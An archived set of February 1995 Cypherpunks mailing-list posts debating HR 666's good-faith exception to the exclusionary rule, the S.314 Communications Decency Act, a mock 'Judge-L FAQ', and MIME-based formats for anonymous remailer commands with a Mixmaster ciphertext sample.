P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Wed, 8 Feb 95 20:44:47 PST
To: cypherpunks@toad.com
Subject: Re: Da Judge-L FAQ -- We are not Amused
Message-ID: <v03001423ab5f4cb21df1@[140.174.229.204]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:56 2/8/95, Timothy C. May wrote:

>It has come to Our attention that Our FAQ, the Da Judge-L FAQ, is being
>distributed amongst the rabble...Defense will be heard, and then the
>guilty will be punished.

Thank you, Sir.  May I have another?

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Wed, 8 Feb 95 17:44:38 PST
To: root <root@einstein.ssz.com>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502090123.TAA01134@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, root wrote:

> Hi all,
> 
> A friend advises me that today House Bill 666 passed. This supposedly would
> allow police officers to use evidence collected illegaly if they 'believed'
> that it was collected in good faith.

This sounds like a spoof.  Look at the number.

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Wed, 8 Feb 95 18:54:49 PST
To: tedwards@src.umd.edu
Subject: Re: Not necessarily crypto but scary anyway...
Message-ID: <9502090254.AA11147@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> On Wed, 8 Feb 1995, Ben wrote:
> 
> > On Wed, 8 Feb 1995, root wrote:
> 
> > > A friend advises me that today House Bill 666 passed. This supposedly would
> > > allow police officers to use evidence collected illegaly if they 'believed'
> > > that it was collected in good faith.
> 
> > This sounds like a spoof.  Look at the number.
> 
> Unfortunately, it is not.  World Wide Web yourself over to 
> http://thomas.loc.gov/ and search for hr 666...you will find it.
> 
> "A Bill to control crime by exclusionary rule reform..." maybe if 
> "control" means "aiding and abetting"
> 
> -Thomas
> 

I haven't looked it up yet, but I did hear about the bill on news 
last night, so I would say it is legit. 

The number of the devil indeed.
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX
http://spirit.aud.alcatel.com:8081/~droelke/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jmueller@gac.edu
Date: Wed, 8 Feb 95 19:20:53 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Vernor Vinge info...
Message-ID: <199502090320.VAA04884@poblano.gac.edu>
MIME-Version: 1.0
Content-Type: text/plain


This may or may not have been already mentioned, but I've noticed that
Vernor Vinge will be the Guest of Honor at this year's Minicon Science
Fiction convention in Minneapolis, MN over easter weekend.  I'm planning
on going, and was just wondering if anyone here had anything in particular
they'd like me to ask him, should I get the chance to talk to him
(considering that I know quite well the chairman of last year's Minicon,
this is distinctly possible).  If anyone would like to attend, memberships
are $25 until February 14, then $55 after that and at the door.  Contact
me for further info if you're interested.

-- 
    Joel Mueller - "Here lies one whose name is writ in water."    -Keats
   		   Check my .plan for my PGP Public Key.  
 		    PGP encrypted mail is very welcome!
  This must be Thursday.  I never could get the hang of Thursdays.  -Dent



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Wed, 8 Feb 95 18:21:01 PST
To: rrothenb@ic.sunysb.edu>
Subject: Re: Effects of S.314 (Communications Decency Act)
Message-ID: <v01510100ab5f0c4d5b89@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:02 AM 2/8/95, strick@techwood.org wrote:
>Right now there is a "safe harbor" from around 10pm (or is it 9pm?)
>thru 6am, but this changes regularly, usually as a result of "case law"
>(someone being prosecuted under next month's rules, not this month's)

Yup, this stuff is subject to change about every week--so much so that at
WFMU, our station manager simply imposed one set of fairly "conservative"
restrictions on "obscene" language at _all_ hours, set it down on paper,
and left it at that.  Can't blame him, as the guidelines were changing
literally every few months and at one point it was very easy to be
operating based on last month's rules.  "Safe harbor" loopholes,
disclaimers, etc., are history right now as far as I know, but of course it
may have changed.

I think the important thing is for the program director to have some
"responsible" codified policy to show to the FCC if they hassle you.  They
mainly want to know that s/he's keeping an eye on things and has some
coherent house rules.  This sucks, of course, but probably makes life
easier in the long run.  I have occasionally let a naughty word on a record
slip by (accidentally, of course), and no one's going to make a big deal
about it.

For a while, we were all convinced that the FCC left all these rules
impossibly vague on purpose, just so that you didn't even know how to obey
the law if you wanted to.  Everyone a potential criminal.

   --Dave.

--
Dave Mandl
dmandl@panix.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 8 Feb 95 18:21:35 PST
To: Ben <samman@CS.YALE.EDU>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <Pine.SUN.3.91.950208211930.24981C-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Ben wrote:

> On Wed, 8 Feb 1995, root wrote:

> > A friend advises me that today House Bill 666 passed. This supposedly would
> > allow police officers to use evidence collected illegaly if they 'believed'
> > that it was collected in good faith.

> This sounds like a spoof.  Look at the number.

Unfortunately, it is not.  World Wide Web yourself over to 
http://thomas.loc.gov/ and search for hr 666...you will find it.

"A Bill to control crime by exclusionary rule reform..." maybe if 
"control" means "aiding and abetting"

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 8 Feb 95 18:29:57 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <199502090231.VAA04807@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


root writes:
> A friend advises me that today House Bill 666 passed. This supposedly would
> allow police officers to use evidence collected illegaly if they 'believed'
> that it was collected in good faith.

Ben writes:
# This sounds like a spoof.  Look at the number.

No, it's for real. This is the `Exclusionary Rule Reform Act of 1995', HR 666.
It was introduced Jan. 25 by a Rep. McCollum, referred to the Judiciary Cmte.,
and on Feb. 2 was "committed to the Committee of the Whole House on the State 
of the Union and ordered to be printed", whatever that means.

Here's an excerpt of the main idea: 

"Evidence [...] shall not be excluded [...] on the ground that the search or 
seizure was in violation of the fourth amendment [...] if the search or 
seizure was carried out in circumstances justifying an objectively reasonable 
belief that it was in conformity with the fourth amendment. The fact that 
evidence was obtained pursuant to and within the scope of a warrant 
constitutes prima facie evidence of the existence of such circumstances."

So I suppose this opens the possibility that, if a judge grants a search 
warrant that allows broader police powers than the 4th Amendment would, then 
the police have free reign to use those broader powers.

This is all via http://thomas.loc.gov/home/c104query.html.

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 8 Feb 95 18:45:17 PST
To: "Craig A. Johnston" <cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: Judges-L FAQ
Message-ID: <ab5f324500021004a86e@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:43 PM 02/08/95, Craig A. Johnston wrote:
>It has come to my attention that the Judges-L FAQ is being distributed
>by someone who obtained it on this list, and being sent to people made
>to look as if it has issued from David Stodolsky.
>
>I must inform you that this FAQ is copyrighted material, and
>you are requested not to distribute it.

Huh?  What kind of an FAQ is it, that can't be freely distributed?  If you
don't expect people to redistribute the text, don't call it an "FAQ".  The
phrase "FAQ list" is understood internet-wide (or at least usenet-wide) to
mean a freely distributable list of information someone might want on a
certain topic.  (It doesn't neccesarily mean "Frequenty Asked Questions",
literally, these days.  Cause there are often FAQs distributed that just
contain general information on a certain topic, but not actually questions
that have ever been asked before.  The Judges FAQ might be a good example.)


If you don't want people to redistribute the thing, the really should
change it's name.  And write very explicitly at the top of the document
that no one should copy it without permission of the author.   These things
just aren't generally supposed to be true of FAQs.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 8 Feb 95 18:50:54 PST
To: root <root@einstein.ssz.com>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502090123.TAA01134@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950208214510.14387A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, root wrote:

> Date: Wed, 8 Feb 1995 19:23:31 -0600 (CST)
> From: root <root@einstein.ssz.com>
> To: cypherpunks@toad.com
> Subject: Not necessarily crypto but scary anyway...
> 
> Hi all,
> 
> A friend advises me that today House Bill 666 passed. This supposedly would
> allow police officers to use evidence collected illegaly if they 'believed'
> that it was collected in good faith.
> 
> Any word on it?
> 
> Thanks.
> 

As I understand the bill,(Though I didn't know it was up for passge...)
 this is merely a restatement of the current judicial doctrine which 
prevents officers acting in good faith from being hindered by an 
illegally issued warrant.  In essence the concept is that the 4th 
ammendment is intended to deter police misconduct by kicking out evidence 
gathered illegally.  Once a judge issues a warrant, and assuming it is 
issued illegally, but with no knowledge by the officers who execute the 
search, there is no longer any deterant value in supressing the evidence 
and as such it would be "counterproductive" to bar it from presentment.

This isn't really passage of "new" law, but legislative clairification of 
current judicial doctrine.  If there is enough interest, I would be happy 
to post cites to the key cases establishing the "good faith" exception to 
exclusion.

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 8 Feb 95 18:53:14 PST
To: Ben <samman@CS.YALE.EDU>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <Pine.SUN.3.91.950208204415.11813A-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <Pine.SUN.3.91.950208215120.14387B-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, Ben wrote:

> Date: Wed, 8 Feb 1995 20:44:27 -0500 (EST)
> From: Ben <samman@CS.YALE.EDU>
> To: root <root@einstein.ssz.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Not necessarily crypto but scary anyway...
> 
> On Wed, 8 Feb 1995, root wrote:
> 
> > Hi all,
> > 
> > A friend advises me that today House Bill 666 passed. This supposedly would
> > allow police officers to use evidence collected illegaly if they 'believed'
> > that it was collected in good faith.
> 
> This sounds like a spoof.  Look at the number.

This would amuse me, as the spoofer would have, in trying to come up with 
an intimidating law that would result in public outrage, instead hit upon 
the current doctrine.

Truth stranger than fiction?

I do seem, however, to recall some mention of legislative clairification 
of the doctrine, so I suspect it to be legitimate.

> 
> Ben.
> 
> 

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 8 Feb 95 18:58:03 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502090231.VAA04807@ducie.cs.umass.edu>
Message-ID: <Pine.SUN.3.91.950208215408.14387C-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 8 Feb 1995, L. McCarthy wrote:

> Date: Wed, 8 Feb 1995 21:31:42 -0500 (EST)
> From: L. McCarthy <lmccarth@ducie.cs.umass.edu>
> To: Cypherpunks Mailing List <cypherpunks@toad.com>
> Subject: Re: Not necessarily crypto but scary anyway...
> 
> root writes:
> > A friend advises me that today House Bill 666 passed. This supposedly would
> > allow police officers to use evidence collected illegaly if they 'believed'
> > that it was collected in good faith.
> 
> Ben writes:
> # This sounds like a spoof.  Look at the number.
> 
> No, it's for real. This is the `Exclusionary Rule Reform Act of 1995', HR 666.
> It was introduced Jan. 25 by a Rep. McCollum, referred to the Judiciary Cmte.,
> and on Feb. 2 was "committed to the Committee of the Whole House on the State 
> of the Union and ordered to be printed", whatever that means.
> 
> Here's an excerpt of the main idea: 
> 
> "Evidence [...] shall not be excluded [...] on the ground that the search or 
> seizure was in violation of the fourth amendment [...] if the search or 
> seizure was carried out in circumstances justifying an objectively reasonable 
> belief that it was in conformity with the fourth amendment. The fact that 
> evidence was obtained pursuant to and within the scope of a warrant 
> constitutes prima facie evidence of the existence of such circumstances."
> 
> So I suppose this opens the possibility that, if a judge grants a search 
> warrant that allows broader police powers than the 4th Amendment would, then 
> the police have free reign to use those broader powers.

Precisely.
Again, if the judge issues the warrant, the damage is done, exclusion is 
pointless.  The concept that police should be expected to know the law is 
apparently, silly.  I suppose you don't want police "second guessing" 
judges, but personally I wouldn't mind the implications.

The review process allows the warrant to be overturned and the evidence 
excluded if the issuing judge's basis for signing the warrant is "clearly 
erronious"  (from memory.)  Where there is good faith involved by all the 
parties however....

> This is all via http://thomas.loc.gov/home/c104query.html.
> 
> -L. Futplex McCarthy
> 

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 8 Feb 95 19:14:24 PST
To: root <root@einstein.ssz.com>
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502090123.TAA01134@einstein.ssz.com>
Message-ID: <Pine.SOL.3.90.950208220830.11572B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Yes, it passed.  You can get a copy from thomas.loc.gov.

The Senate still has to pass it (but certainly will).
I think the Senate version is S3.

Brad Dolan


On Wed, 8 Feb 1995, root wrote:

> Hi all,
> 
> A friend advises me that today House Bill 666 passed. This supposedly would
> allow police officers to use evidence collected illegaly if they 'believed'
> that it was collected in good faith.
> 
> Any word on it?
> 
> Thanks.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Wed, 8 Feb 95 20:10:17 PST
To: cypherpunks@toad.com
Subject: Re: S314 and potential hell-raising
Message-ID: <v0151011cab5f38526c94@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


>enlisting the ACLU, the EFF, and any other group potentially willing
>to pour money into a legal battle.


Fuck the EFF, they already lost they're place in importance. The ACLU is a very good
place to start however. Ideas??

_____________________________________                  
{-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-}
{-:      www server: http://josaiah.sewanee.edu/         :-}
{-: Finger 'jme@josaiah.sewanee.edu' for my Public :-}
                                        PGP block.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@tower.techwood.org (Name Withheld)
Date: Wed, 8 Feb 95 22:28:07 PST
To: cypherpunks@toad.com
Subject: Coming to a newsserver near you alt.defeat.s314
Message-ID: <199502090627.WAA01928@tower.techwood.org>
MIME-Version: 1.0
Content-Type: text/plain


Psychic Flash...This group will be up on auto-subscribing news server's
VERY soon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 8 Feb 95 22:35:58 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <PiQElKjqRmN1078yn@mirage.skypoint.com>
Message-ID: <199502090633.WAA08858@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Samuel Kaplin wrote:

> In article <Pine.3.89.9502081135.A7848-0100000@netcom10>, you wrote:
> > On Tue, 7 Feb 1995, Samuel Kaplin wrote:
> > > I find it amazing that CPR and EFF
> > > haven't picked this up yet.
> >
> > Really?
> 
> I had at least hoped that they would have their ear to the ground.
> Unfortunately I was wrong. ;(

It's a tough thing for them to be involved enough to know what's going
on, but not so involved as to be a partner in the process.

We mostly all criticized them roundly for the Digital Telephony Bill
(I did too). They seem to have somewhat backed off from this approach,
or so it now appears to many of us. (Caveat:  before this is read by
EFF folks and indignantly denied, I make no claims of what the causal
chain was, what Berman's departure has to do with this, etc. Hence the
"they seem to have" phrasing.)

Anyway, how can we expect them to know about upcoming legislation if
we also despise the "inside the Beltway" mentality?

Frankly, I'd rather have them on our side, helping to fight bad
legislation, than working on the inside of things and thus face
compromise by the whole process.

As scary as S.314 is, I'm not sure it's likely to pass. Unlike the
Digital Telephony Bill, which was on greased skids, this  one seems to
have come out of left field. I could be wrong on this, and maybe it's
got a lot of sponsors, but it sounds like just another Bill that will
die in committee or fail on the floor.

(This is where the D.C.-net people, those who are connected to the
political process, can tell us who's likely to support it and who's
not.)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Wed, 8 Feb 95 22:35:18 PST
To: Hal <cypherpunks@toad.com
Subject: Re: MIME based remailing commands
Message-ID: <ab5f62d802021004dd65@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


>Nathaniel Borenstein <nsb@nsb.fv.com> writes:
>
>>Excerpts from junk.interesting: 7-Feb-95 Re: MIME based remailing co..
>>"Perry E. Metzger"@imsi. (2553)
>
>>> > > It is being remailed via a MIME-based structure where two new
>>>content types
>>> > > are defined: multipart/remail and application/remail-commands.  The
>>> > > multipart/remail type is supposed to be composed of two parts, the
>>> > > application/remail-commands part which has remailer commands, and the
>>> > > other part which is the "payload" to be remailed.
>
>>Perhaps you might consider writing up an informational RFC to define
>>these types?  I think that would be very useful. -- Nathaniel
>
>Well, that was just an example; I was making those names up off the top
>of my head in order to concretize what I understood Perry was suggesting.
>
>I can see that putting remailer commands into a specific part of a MIME
>multipart message has some advantages.  Right now we are basically
>having the remailing commands be mail header fields.  But really people
>aren't supposed to just make up new fields like that.  I think the
>"name space" of these fields is protected somewhat more than many other
>aspects of communication protocols on the net.  Is there precedent for
>adding service-by-mail functionality in this way?  I am not completely
>comfortable with it.  And as we think of new functionality and new
>commands they all have to get added at this top level, the same
>visibility and name space as "Subject", "From", and "To".
>
>OTOH it does have the advantage that it is easy to do, at least with the
>"::" pasting token idea (which perhaps would need to be documented in its
>own right).
>
>If we did use a separate message part we'd have our own little name space
>to use, with no fears of conflicting with someone else.  (Maybe "Latency"
>might be used in a future extension of RFC822 for some other meaning than
>what we are using it for.)  I am not sure what has to be done to get an
>RFC approved but I suspect that adding mail header fields would be much
>more likely to hit opposition than adding yet another MIME type.
>
>What does Mixmaster use for its commands?  Does it use "::" followed by
>Anon-Send-To: and such?  Or some other format?  Maybe it should be made
>MIME compliant from the beginning.  This way we are moving with the
>current, the flow of the net, rather than across it.
>
>Hal

With Mixmaster, everything is hidden inside the encrypted and ascii armored
message structure.

I use the :: token to let the remailer know that this is a remailer message
of some sort. The Remailer-Type will eventually be used to indicate the
version that created the message. It would be easy to add support for MIME.
It would just replace the token and version number.

All remailing instructions are inside the ascii armor.
Note that the block of ascii armor is allways exactly the same length.

::
Remailer-Type: 2.0

-----BEGIN REMAILER MESSAGE-----
hQCMAgbmF1BLzawNAQP/RFw2/UagugMFPlnJ94KLmhaxDoplzAhNBCxuFRL2fosL
V1YnFd2XVckJJ6vTe6DB+POO+V7HEdXkp3sWtjb56Am+/B+tM1TdeC6NPNV4g5PC
15oYl7eD0ZxyjB34GdN5z/C2mOMbvP3k9eK3pn3ffkaXHBt1Y0I9ZieHkE6erxem
AAAAusuiqVunPh15+7gttD5pNuIAOFDKfH8NJ39ReSEFAeeiOun6KSneJT+2DJ9Q
LbK14WqsBVu1kDaUOHKchE9hPSFfTijTJp7I+GuiuOkDChUzZNZ21xpBS+8xMg58
0i61z9EEf11G0G5JShTaeaGWNd14QxoyrxjTh9PrItOz49M9lSY71KoTP2+fVc0h
xDGHw7iVeeToOtFqmDBI14FOVJz2rYuMu7vTD+MTwP3INkraCXqTeBoJ7g31Nhqj
<SNIP>
LbK14WqsBVu1kDaUOHKchE9hPSFfTijTJp7I+GuiuOkDChUzZNZ21xpBS+8xMg58
0i61z9EEf11G0G5JShTaeaGWNd14QxoyrxjTh9PrItOz49M9lSY71KoTP2+fVc0h
xDGHw7iVeeToOtFqmDBI14FOVJz2rYuMu7vTD+MTwP3INkraCXqTeBoJ7g31Nhqj
VYbH5jxvKPjF4HEaS++MaBwTvzBkEKxbS+6oh7G/ndkHBxA7d7C0sx+qX9sjJyAs
OIpGERZYA9RVspXUWys5fihnwrhk90dDAVZb8hTsPQfTXLp4
=ouPq
-----END REMAILER MESSAGE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 8 Feb 95 19:40:30 PST
To: cypherpunks@toad.com
Subject: Re: Not necessarily crypto but scary anyway...
Message-ID: <ab5f3ee0020210049ec6@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:50 PM 02/08/95, Black Unicorn wrote:
>As I understand the bill,(Though I didn't know it was up for passge...)
> this is merely a restatement of the current judicial doctrine which
>prevents officers acting in good faith from being hindered by an
>illegally issued warrant.  In essence the concept is that the 4th
>ammendment is intended to deter police misconduct by kicking out evidence
>gathered illegally.  Once a judge issues a warrant, and assuming it is
>issued illegally, but with no knowledge by the officers who execute the
>search, there is no longer any deterant value in supressing the evidence
>and as such it would be "counterproductive" to bar it from presentment.

Right, just what we want to do. Encourage police officers to remain as
ignorant as humanly possible about constitutional law and citizens' rights.
If the police officers can manage to remain so ignorant of con law that
they have absolutely no idea that sometimes they aren't supposed to search
citizens' property, appearantly all the evidence they aquire will be
admissible in court.

Well, I feel safer knowing that we encourage a police force that won't let
a little knowledge of the bill of rights interfere with there ability to
apprehend drug dealers, terrorists, and pedophiles.

But if it's already current practice, it's already current practice.  Of
course, it would be nice if our legislators took time to write law which
_increased_ our rights, or which more strictly defined rights that previous
legislation and constitution as interpreted by the courts defined loosely.
Instead, we seem to to expect congress to constantly try to get laws by the
supreme court that are completely totalitarian, and feel lucky when they
merely reinforce preexisting undesirable court decisions. sigh.  Jefferson
_and_ Hamilton are both spinning in their graves.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Wed, 8 Feb 95 09:39:16 PST
To: cypherpunks@toad.com
Subject: Re:  Selection key crypto protocol trial balloon
In-Reply-To: <9502070328.AA13539@anchor.ho.att.com>
Message-ID: <J84c2c4w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


wcs@anchor.ho.att.com writes:

> I'm not sure I really believe it's workable, but what it does
> sound a bit like is CDMA spread-spectrum, which lets a bunch of

Um no. The main thing is that what is extracted with the selection key is
_different_ from what was put in...


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 8 Feb 95 22:05:41 PST
To: mlist-cypherpunks@nntp-server.caltech.edu
Subject: Re: S314 and potential hell-raising
In-Reply-To: <3hb6vd$2q4@gap.cco.caltech.edu>
Message-ID: <sDQElKjqRO9A078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <3hb6vd$2q4@gap.cco.caltech.edu>, you wrote:

> We simply MUST isolate this bill and, if it even comes close to sounding
> like what I think it does (ending the near-absolute freedom of expression
> and content across the Internet), we must fight it in every way possible,
> enlisting the ACLU, the EFF, and any other group potentially willing
> to pour money into a legal battle.

I just got a reply from Stanton M. from EFF today. To paraphrase, "No we're
not in favor of it and we're working on a response."

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
         A pessimist sees "No parking." - An optimist sees "Anytime."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLzmujslnXxBRSgfNAQFk8gf8DDjpbTHnSAb9os88Xu2UlYfJWsAoNFf5
cT8kY9XS0yRyeTfIuKmiZqC+tc1QqA6+K/EgwFYlpx9TY3dgn44hrWlAQkMRR4a5
P9ugjtNJXIlbWlS6r4XSOZeUABy8WnQfkkHM2UHAKtmxv2dnA7nXBzkeWAuF7kMc
ECgBbb468jMQOVhXjKxVXh/KLQtw/Ujb89jMBlQa5wi2ddnQ0fisDwhH0ZhKQ9Ih
GkJHhZCiIUEoCe09ye3eM5pyM9BuXr5hjV7pPUuXtFjqHeFFHZdLRv/ERuHL7z4n
w7JuxxyHmh84ZG4f9asakuFL3eLHuIEId5LJvtKN7BMnMv+iVPDZHQ==
=pPn0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <alkahest!joshua@dee.retix.com>
Date: Wed, 8 Feb 95 23:23:08 PST
To: tcmay@netcom.com
Subject: Re: Da Judge-L FAQ -- We are not Amused
In-Reply-To: <199502090356.TAA04852@netcom10.netcom.com>
Message-ID: <199502090712.XAA14865@alkahest.isas.com>
MIME-Version: 1.0
Content-Type: text/plain



here come de judge:

>   The so-called Cypherpunks List, having been a party to this illegal
>   and "most heinous" distribution, is hereby invited to appear in our
>   Chambers on the morning of Tuesday, 29 February, 1995, at a place of
>   our choosing. Defense will be heard, and then the guilty will be
>   punished.

yes. a fair trial and a speedy execution.

josh










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <alkahest!joshua@dee.retix.com>
Date: Wed, 8 Feb 95 23:21:56 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu
Subject: Re: S314 and potential hell-raising
In-Reply-To: <v0151011cab5f38526c94@[152.97.12.101]>
Message-ID: <199502090715.XAA14870@alkahest.isas.com>
MIME-Version: 1.0
Content-Type: text/plain



>   >enlisting the ACLU, the EFF, and any other group potentially willing
>   >to pour money into a legal battle.

>   Fuck the EFF, they already lost they're place in importance. The ACLU is 
>   a very good place to start however. Ideas??

there's room for another organization I think. there are, in my opinion,
two reasons why the NRA is as effective as it is: it has a single issue
that it concerns itself with and it never compromises.

so what, in very few words and as clearly as possible, is our issue?

josh







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 8 Feb 95 22:05:36 PST
To: cypherpunks@toad.com
Subject: Re: S314 and potential hell-raising
In-Reply-To: <v0151011cab5f38526c94@[152.97.12.101]>
Message-ID: <5QQElKjqRmxA078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <v0151011cab5f38526c94@[152.97.12.101]>, you wrote:
> >enlisting the ACLU, the EFF, and any other group potentially willing
> >to pour money into a legal battle.
>
>
> Fuck the EFF, they already lost they're place in importance. The ACLU is a very good
> place to start however. Ideas??

There are going to be a lot of factions involved with this one. Some
desirable, some not. (I leave it up to the individual to make the
judgment) Maybe we can learn something from the military and apply c3
(Command, Control and Communications) to this. Set up a forum for
coordinating efforts, delegate tasks, most important communicate so we
don't waste resources on redundant efforts. The religious right has
successfully been doing this for years. Perhaps a dose of their own medicine
is in order. Anyone care to create a newsgroup? ;)


- --
==============================================================================
